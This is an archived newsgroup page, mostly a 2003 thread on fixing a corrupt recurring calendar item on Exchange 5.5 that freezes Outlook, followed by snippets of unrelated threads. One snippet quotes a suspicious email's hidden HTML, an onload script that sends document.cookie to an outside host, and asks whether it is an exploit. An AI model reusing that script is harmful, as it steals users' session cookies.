Exchange Calendar Item vs. Outlook problem

Our Exchange 5.5 (SP4) server has what appears to be a corrupt calendar item
for January 20, 2004.  Those people who have this recurring(?) calendar item
experience an Outlook lock up (CPU 100% running process outlook.exe) when
accessing their calendar for that date and when syncing for offline Outlook
use.  This effects Outlook versions 2000 and 2002.  Because the item can not
be accessed from an Outlook client it can not be deleted.  Is there a way to
delete recurring calendar items from a specific date in the private data
store?  Is there an Outlook patch that prevents the CPU utilization problem
so the item can be accessed and deleted?  Thanks.
  Don Williams

Have you tried connecting with OWA?

Patrick Rouse
Microsoft MVP - Terminal Server

0
anonymous (74717)
12/19/2003 4:00:02 PM
Yes.  Pegs the OWA server at 100% utilization and no updates are sent to the
OWA client.

"Patrick Rouse [MVP]" <anonymous@discussions.microsoft.com> wrote in message
> Have you tried connecting with OWA?
>
> Patrick Rouse
> Microsoft MVP - Terminal Server

have you tried running Outlook with the /cleanreminders  or /cleanfreebusy
switches?

"Don Williams" <Don.Williams@NOcMoreMedicalSPAM.com> wrote in message
> Yes.  Pegs the OWA server at 100% utilization and no updates are sent to
the
> OWA client.
>
> "Patrick Rouse [MVP]" <anonymous@discussions.microsoft.com> wrote in
message
> > Have you tried connecting with OWA?
> >
> > Patrick Rouse
> > Microsoft MVP - Terminal Server

0
susan7353 (1225)
12/19/2003 4:34:23 PM
Thanks.  Tried but it did not work.  Outlook client hits 100% CPU util and
dies.

"Susan" <susan@nospam.com> wrote in message
> have you tried running Outlook with the /cleanreminders  or /cleanfreebusy
> switches?
>
> "Don Williams" <Don.Williams@NOcMoreMedicalSPAM.com> wrote in message
> > Yes.  Pegs the OWA server at 100% utilization and no updates are sent to
> the
> > OWA client.
> >
> > "Patrick Rouse [MVP]" <anonymous@discussions.microsoft.com> wrote in
> message
> > > Have you tried connecting with OWA?
> > >
> > > Patrick Rouse
> > > Microsoft MVP - Terminal Server

have you tried exporting the entire calendar to a pst file?  or using
exmerge to archive the entire mailbox contents to a pst file?

"Susan" <susan@nospam.com> wrote in message
> have you tried running Outlook with the /cleanreminders  or /cleanfreebusy
> switches?
>
> "Don Williams" <Don.Williams@NOcMoreMedicalSPAM.com> wrote in message
> > Yes.  Pegs the OWA server at 100% utilization and no updates are sent to
> the
> > OWA client.
> >
> > "Patrick Rouse [MVP]" <anonymous@discussions.microsoft.com> wrote in
> message
> > > Have you tried connecting with OWA?
> > >
> > > Patrick Rouse
> > > Microsoft MVP - Terminal Server

0
susan7353 (1225)
12/19/2003 6:22:04 PM
There's also a utility called MDBVU32.exe to view & modify
a mailbox w/o Outlook, but avoid it because there's not
good (IMHO) documentation and it's kinda confusing, but it
may be what you need.

Calling PSS might not be a bad idea either.

Have you tried exporting one of the mailboxes to PST,
delete the calendar item, then import back to IS?  Not a
pleasant thing to do but worth a try.

wrote in message
>> > Yes.  Pegs the OWA server at 100% utilization and no
updates are sent to
>> the
>> > OWA client.
>> >
>> > "Patrick Rouse [MVP]"
<anonymous@discussions.microsoft.com> wrote in
>> message

0
anonymous (74717)
12/19/2003 6:49:51 PM
Any access of the calendar data appears to cause outlook to stop responding.
I have not tried exmerge.  Assuming it is possible, what is the downside
(other than loosing calendar data) of attempting to delete the entire
calendar folder?  From one of the Q articles they made a reference to
Outlook creating a new, empty calendar folder if one did not exist.

> have you tried exporting the entire calendar to a pst file?  or using
> exmerge to archive the entire mailbox contents to a pst file?
>
> "Susan" <susan@nospam.com> wrote in message
> > have you tried running Outlook with the /cleanreminders  or
/cleanfreebusy
> > switches?
> >
> > "Don Williams" <Don.Williams@NOcMoreMedicalSPAM.com> wrote in message
> > > Yes.  Pegs the OWA server at 100% utilization and no updates are sent
> > the
> > > OWA client.
> > >
> > > "Patrick Rouse [MVP]" <anonymous@discussions.microsoft.com> wrote in
> > message

what version of Outlook are you using?  do you possibly have a pc somewhere
you could intall the old Exchange client on, and try to delete the item that
you suspect is corrupt there?  it might be worth a shot...otherwise, I would
use exmerge to completely archive the entire mailbox, at which point,
nothing should be left in it...then you can selectively import the data from
the pst file...you might need to do it one sub-folder at a time, omitting
the calendar...

> Any access of the calendar data appears to cause outlook to stop
responding.
> I have not tried exmerge.  Assuming it is possible, what is the downside
> (other than loosing calendar data) of attempting to delete the entire
> calendar folder?  From one of the Q articles they made a reference to
> Outlook creating a new, empty calendar folder if one did not exist.
>
> "Susan" <susan@nospam.com> wrote in message
> > have you tried exporting the entire calendar to a pst file?  or using
> > exmerge to archive the entire mailbox contents to a pst file?
> >
> > "Susan" <susan@nospam.com> wrote in message
> > > have you tried running Outlook with the /cleanreminders  or
> /cleanfreebusy
> > > switches?
> > >
> > > "Don Williams" <Don.Williams@NOcMoreMedicalSPAM.com> wrote in message
> > > the

> > > message

0
susan7353 (1225)
12/19/2003 9:48:30 PM
Hi Don,

we had this happening to us last week. Below is the advice I recieved in
another N.G., ms public.outlook.calendaring.
It worked perfectly for us, took me half an hour to find and remove the
corrupted item, without having to worry about losing data.
Maybe this will work for you as well?

----------
Probably a corrupt meeting in the calendar. I have found that
it is usually in a recurring appointment that has gone bad during
the week of the freeze (when did the freeze start?)

1) Open the Outlook but do not try to open the calendar.

2) Create a New folder (Calendar Test)

3) Do an advanced find on the old calendar and sort events
    by recurrence.

    - Press F3
    - Change the Look For: text box to Appointments and Meetings
    - Click on the Advanced tab
    - Click Field
    - Select All Appointment fields
    - Select Recurring
    - Condition: equals
    - Value: Yes
    - Click the Add to List button
    - Click Find Now

Drop and drag from advanced find listed events one at a time to
the new calendar, when you get to the corrupt item it will give
you an error message or it will hang. (delete this item)

Or if it is not a recurring (which our's always are) you could
perform the find for all and do the same as above...

Move all your calendar items from Calendar Test folder back to
original calendar (these are previously dragged over items).

--
Nikki Peterson [MVP - Outlook]

--------------------

Success,
Sjef

"Don Williams" <Don.Williams@NOcMoreMedicalSPAM.com> wrote in message
> Any access of the calendar data appears to cause outlook to stop
responding.
> I have not tried exmerge.  Assuming it is possible, what is the downside
> (other than loosing calendar data) of attempting to delete the entire
> calendar folder?  From one of the Q articles they made a reference to
> Outlook creating a new, empty calendar folder if one did not exist.
>
> "Susan" <susan@nospam.com> wrote in message
> > have you tried exporting the entire calendar to a pst file?  or using
> > exmerge to archive the entire mailbox contents to a pst file?
> >
> > "Susan" <susan@nospam.com> wrote in message
> > > have you tried running Outlook with the /cleanreminders  or
> /cleanfreebusy
> > > switches?
> > >
> > > "Don Williams" <Don.Williams@NOcMoreMedicalSPAM.com> wrote in message
> > > the

> > > message

0
f6060 (5)
12/20/2003 11:41:04 AM
That fixed it!  Thank you!
  Don Williams

"Spie" <f@ke.all> wrote in message
> Hi Don,
>
> we had this happening to us last week. Below is the advice I recieved in
> another N.G., ms public.outlook.calendaring.
> It worked perfectly for us, took me half an hour to find and remove the
> corrupted item, without having to worry about losing data.
> Maybe this will work for you as well?
>
> ----------
> Probably a corrupt meeting in the calendar. I have found that
> it is usually in a recurring appointment that has gone bad during
> the week of the freeze (when did the freeze start?)
>
> 1) Open the Outlook but do not try to open the calendar.
>
> 2) Create a New folder (Calendar Test)
>
> 3) Do an advanced find on the old calendar and sort events
>     by recurrence.
>
>     - Press F3
>     - Change the Look For: text box to Appointments and Meetings
>     - Click on the Advanced tab
>     - Click Field
>     - Select All Appointment fields
>     - Select Recurring
>     - Condition: equals
>     - Value: Yes
>     - Click the Add to List button
>     - Click Find Now
>
> Drop and drag from advanced find listed events one at a time to
> the new calendar, when you get to the corrupt item it will give
> you an error message or it will hang. (delete this item)
>
> Or if it is not a recurring (which our's always are) you could
> perform the find for all and do the same as above...
>
> Move all your calendar items from Calendar Test folder back to
> original calendar (these are previously dragged over items).
>
> --
> Nikki Peterson [MVP - Outlook]
>
> --------------------
>
> Success,
> Sjef
>
> "Don Williams" <Don.Williams@NOcMoreMedicalSPAM.com> wrote in message
> > Any access of the calendar data appears to cause outlook to stop
> responding.
> > I have not tried exmerge.  Assuming it is possible, what is the downside
> > (other than loosing calendar data) of attempting to delete the entire
> > calendar folder?  From one of the Q articles they made a reference to
> > Outlook creating a new, empty calendar folder if one did not exist.
> >
> > "Susan" <susan@nospam.com> wrote in message
> > > have you tried exporting the entire calendar to a pst file?  or using
> > > exmerge to archive the entire mailbox contents to a pst file?
> > >
> > > "Susan" <susan@nospam.com> wrote in message
> > /cleanfreebusy

> sent

You're welcome. Good to hear it worked.

Sjef

"Don Williams" <Don.Williams@cmoreNOSPAMmedical.com> wrote in message
> That fixed it!  Thank you!
>   Don Williams
>
> "Spie" <f@ke.all> wrote in message
> > Hi Don,
> >
> > we had this happening to us last week. Below is the advice I recieved in
> > another N.G., ms public.outlook.calendaring.
> > It worked perfectly for us, took me half an hour to find and remove the
> > corrupted item, without having to worry about losing data.
> > Maybe this will work for you as well?
> >
> > ----------
> > Probably a corrupt meeting in the calendar. I have found that
> > it is usually in a recurring appointment that has gone bad during
> > the week of the freeze (when did the freeze start?)
> >
> > 1) Open the Outlook but do not try to open the calendar.
> >
> > 2) Create a New folder (Calendar Test)
> >
> > 3) Do an advanced find on the old calendar and sort events
> >     by recurrence.
> >
> >     - Press F3
> >     - Change the Look For: text box to Appointments and Meetings
> >     - Click on the Advanced tab
> >     - Click Field
> >     - Select All Appointment fields
> >     - Select Recurring
> >     - Condition: equals
> >     - Value: Yes
> >     - Click the Add to List button
> >     - Click Find Now
> >
> > Drop and drag from advanced find listed events one at a time to
> > the new calendar, when you get to the corrupt item it will give
> > you an error message or it will hang. (delete this item)
> >
> > Or if it is not a recurring (which our's always are) you could
> > perform the find for all and do the same as above...
> >
> > Move all your calendar items from Calendar Test folder back to
> > original calendar (these are previously dragged over items).
> >
> > --
> > Nikki Peterson [MVP - Outlook]
> >
> > --------------------
> >
> > Success,
> > Sjef
> >
> > "Don Williams" <Don.Williams@NOcMoreMedicalSPAM.com> wrote in message
> > > Any access of the calendar data appears to cause outlook to stop
> > responding.
> > > I have not tried exmerge.  Assuming it is possible, what is the
downside
> > > (other than loosing calendar data) of attempting to delete the entire
> > > calendar folder?  From one of the Q articles they made a reference to
> > > Outlook creating a new, empty calendar folder if one did not exist.
> > >
> > > "Susan" <susan@nospam.com> wrote in message

> > > /cleanfreebusy

> message
> > sent

> in

0
f6060 (5)

Exchange Cluster

Exchange

Easy return of one item
Hello, Am I missing something or do I really have to put every item on a receipt on an invoice to return one item. Say there is 100 line items on a receipt. How can I easily specify one line? Thanks, Brian Using the "Recall for return" function, you are going to get all items from the transaction as you have seen. You can delete items from the return ( if you have the proper cashier rights ) , but you can't select which item from the transaction you want before recalling it. You can just switch a blank transaction into return mode, then add the single item being returned....

outlook express 6 (no pics in outgoing mail)
I have outlook express 6. I used to have no problem sending pictures in email. Recently, they simply won't go. I have checked all the settings, at least the ones I know of, to no avail. I've gone to the HTML setting and set it to "send pictures". I still, however, get only a box with the picture name on all outgoing mail. Incoming has all pictures as they should be and I can send .jpg's as attachments. Nothing included in the body of the mail works. Any help would be greatly appreciated!! "bill a" <anonymous@discussions.microsoft.com> wrote in messa...

Cannot Unistall IMF Exchange 2003

Shipping Cost into Item Cost
Hi, I am a retailer of apparel, and shipping costs usually account for about 2-5% of the actual cost of the item. Because sometimes different suppliers have different item costs, I try to include the shipping costs into the item costs in my purchase order. What exactly happens when I put a value into the shipping option, rather than figuring out the shipping cost per item and adding it into my item cost? Is there a way for me to have it automatically share that shipping cost into the item cost? THANKS! ...

hyperlinking to an item in Global Address List
I have figured out how to hyperlink (html) to an item in my contact list: outlook:Contacts/~John Doe This works great. Now I would like to be able to issue a command to open a specific contact from the Global Address List. It is possible that the Global Address List has some folder name like GAL so that a command like this: outlook://GAL/~John Doe could be issued. Does anyone know how to refer to the Global Address List by its folder name or to do what I am asking? This can't be done, but you can add the GAL entry to your contact folder and then do what you know. Is that good en...

Exchange / POP3

Backing Up emails and contacts in outlook 2002
I have had to reformat my computer and have lost all contacts and emails. It is extremely important that this information is retained for my business. How can I back the entire file so that this doesn't happen again. Signed, sincerely upset. Search for .pst files at your hard disk (it may be hidden or in a hidden directory) and save the file. You can at any time open it in Outlook using file/open. Thomas Quester www.outlookfolders.de "Deborah" <anonymous@discussions.microsoft.com> schrieb im Newsbeitrag news:5efd01c42dcd$75212ab0$a101280a@phx.gbl... >I have...

virus attacks against Exchange

Is this an exploit that will do anything in Outlook?
Folks- One of my users got an e-mail message from a Yahoo user; the message had the following very interesting HTML code at the end ... <DIV id=a> </DIV> <DIV id=b style="VISIBILITY: hidden"></DIV> <STYLE onload="window.status=''; var x = escape(document.cookie).substr(0,1900) ; b.innerHTML='<iframe src=http://yahoo.game-host.org:1646/index.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&amp;cookie=\''+x+'\' frameborder=0 width=10 height=10></iframe>test'; " type=...

Series range construct problem
Stupid problem really I cannot properly construct a series range object for my non adjacent series columns: MyRows = Range("A1").End(xlDown).Rows ActiveChart.SetSourceData Source:=Sheets("Sheet1").Range( _ "A2:A" & MyRows & " , C2:C" & MyRows, E2:E" & MyRows), PlotBy:=xlColumns The above range object is the problem. What am I doing wrong? Thanks Bill Bill - Try this approach. Sub DoChart() Dim MyRows As Long MyRows = Sheets("Sheet1").Range("A1").End(xlDown).Rows ...

store item quantity
hi can any one tell me which table includes the item quantity of each store in hq database. thanks ItemDynamics -- Thank you, Ryan Sakry Program Manager Retail Information Technology Enterprises (RITE) rsakry@rite.us http://www.rite.us 320-230-2282 ext. 4002 (Office) 320-230-1796 (Fax) "BACHA11" <BACHA11@discussions.microsoft.com> wrote in message news:C6817D99-2062-43A8-9CC4-65D7EB17360B@microsoft.com... > hi > can any one tell me which table includes the item quantity of each store > in > hq database. > thanks thank you ryan ,i got it "Ryan @ R...

Exchange 2003 #5

Automatic Outlook and Outlook express Configuration
Hello, I am looking for a script or an exe file that will ask the users their username, domain, and the email program they are using, delete the old configuration and configure their outlook/outlook express accounts automatically. The scripts I found do not change the incoming and outgoing mail ports (since we use gmail I need to change them). Do you know of any script, .exe file that I can send the users to configure their own accounts? Thank you in advance. Ozgur Ozdemircili ...

Exchange-Integrated Help Desk Software

Item level recovery of Hyper-V VMs without VT
Hi there, I have DPM 2010 running in a VM. I'd like to do item-level recovery of other VMs. DPM 2010 told me that I need to install the Hyper-V role... But this is obviously impossible as it's living in a VM itself. It'd be great if the final version of DPM 2010 supported item-level recovery without requiring hardware virtualization features. Simon DPM 2010 needs to mount VHDs in order to provide item-level recovery of VMs. This functionality is provided by Hyper-V role in Windows 2008 and hence Hyper-V role is needed by DPM 2010. But we hear your feedback and...

Microsoft Exchange #3

Calendar and Holidays
Greetings, I have a special calendar for our organization that includes "exception" non-working days for 11/26 and 11/27 (Thanksgiving holiday). We also have "dummy" projects like Absence where folks enter their time via My Tasks whereby. The entire team is assigned at 0 hours ahead of time so the "task" shows up in My Tasks. All operational activities are posted this way. Anyway, apparently there is a bug in Project Server (I'm at the June CU) where when someone enters time for 11/26 and 11/27 in My Tasks in the "Absence" task, Proj...

recover mails from .bak file in ms outlook
Dear All I had some problem with MS Outlook (2003). I found that there was a problem with .PST file I tried to repair it with SCANPST.EXE. It repaired my OUTLOOK.PST file but many mails are missing. I had taken bakup of .PST file into .BAK file. Please guide me how can in recover my mails from .BAK file Thanks Vimal -- vimalrupera If you have a backup copy of your pst and you recover it, then you may well find the problem is also recovered. What format is your pst file? - If your pst is open in Outlook, select properties of the personal folders, Advanced, what is sh...

exchange 5.5 to exchange 2000

Problems between two Exchange Servers